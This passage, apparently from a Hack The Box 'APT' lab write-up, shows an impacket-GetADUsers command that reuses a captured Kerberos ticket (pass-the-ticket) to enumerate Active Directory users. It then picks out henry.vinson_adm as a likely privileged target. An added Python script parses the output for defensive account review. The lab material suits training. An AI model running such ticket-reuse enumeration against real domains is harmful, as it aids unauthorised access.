Username Extraction


Extracting domain users through the pass_the_ticket technique with the TGT of the henry.vinson user

┌──(kali㉿kali)-[~/archive/htb/labs/apt]
└─$ KRB5CCNAME=smb/hashdump/henry.vinson@apt.htb.local.ccache impacket-GetADUsers htb.local/henry.vinson@apt.htb.local -no-pass -k -dc-ip $IPv6 -all
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Getting machine hostname
[*] Querying APT for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
administrator                                         2020-09-24 09:16:56.877100  2023-10-22 14:26:23.366700 
Guest                                                 <never>              <never>             
DefaultAccount                                        <never>              <never>             
krbtgt                                                2020-09-24 09:16:10.955170  <never>             
henry.vinson                                          2020-09-24 09:23:05.049694  2023-10-22 21:33:20.842154 
henry.vinson_adm                                      2020-09-24 09:23:05.190322  2020-10-23 12:01:51.244555 

In contrast to the 2000 domain users found earlier, there are only 2 non-default domain users: henry.vinson and henry.vinson_adm. Judging by the name, the henry.vinson_adm user is likely an administrative account with high privileges.
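
The same filtering, done as an account review on the defender side: an added example (not part of the original notes or of Impacket) that parses the GetADUsers table above, drops the built-in accounts, and flags admin-style names and long-idle accounts. The `_adm` naming pattern, the 365-day threshold and the review date are assumptions.

```python
import re
from datetime import datetime

# Rows copied from the GetADUsers output above. The timestamps are wider than
# the 19-character header columns, so fixed-width slicing would misparse them.
SAMPLE = """\
Name                  Email                           PasswordLastSet      LastLogon
--------------------  ------------------------------  -------------------  -------------------
administrator                                         2020-09-24 09:16:56.877100  2023-10-22 14:26:23.366700
Guest                                                 <never>              <never>
DefaultAccount                                        <never>              <never>
krbtgt                                                2020-09-24 09:16:10.955170  <never>
henry.vinson                                          2020-09-24 09:23:05.049694  2023-10-22 21:33:20.842154
henry.vinson_adm                                      2020-09-24 09:23:05.190322  2020-10-23 12:01:51.244555
"""

BUILTIN = {"administrator", "guest", "defaultaccount", "krbtgt"}
# Assumption: privileged accounts follow an adm/admin prefix or suffix convention.
ADMIN_HINT = re.compile(r"^adm(in)?[._-]|[._-]adm(in)?$", re.I)
TS = r"<never>|\d{4}-\d\d-\d\d \d\d:\d\d:\d\d(?:\.\d+)?"
ROW = re.compile(
    rf"^(?P<name>\S+)\s+(?:(?P<email>\S+@\S+)\s+)?(?P<pwd>{TS})\s+(?P<logon>{TS})\s*$"
)

def _ts(value):
    """Convert a GetADUsers timestamp to datetime; '<never>' becomes None."""
    return None if value == "<never>" else datetime.strptime(value[:19], "%Y-%m-%d %H:%M:%S")

def parse_users(text):
    """Parse data rows by token shape; header and separator rows do not match."""
    users = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            users.append({"name": m["name"], "email": m["email"],
                          "pwd_last_set": _ts(m["pwd"]), "last_logon": _ts(m["logon"])})
    return users

def review(users, now, stale_days=365):
    """Drop built-in accounts, then flag admin-style names and idle accounts."""
    findings = []
    for u in users:
        if u["name"].lower() in BUILTIN:
            continue
        idle = (now - u["last_logon"]).days if u["last_logon"] else None
        findings.append({"name": u["name"],
                         "admin_named": bool(ADMIN_HINT.search(u["name"])),
                         "idle_days": idle,
                         "stale": idle is None or idle > stale_days})
    return findings

if __name__ == "__main__":
    for f in review(parse_users(SAMPLE), now=datetime(2023, 10, 23)):  # assumed review date
        print(f)
```

An admin-named account that has been idle this long is a candidate for disabling or removal during account hygiene reviews.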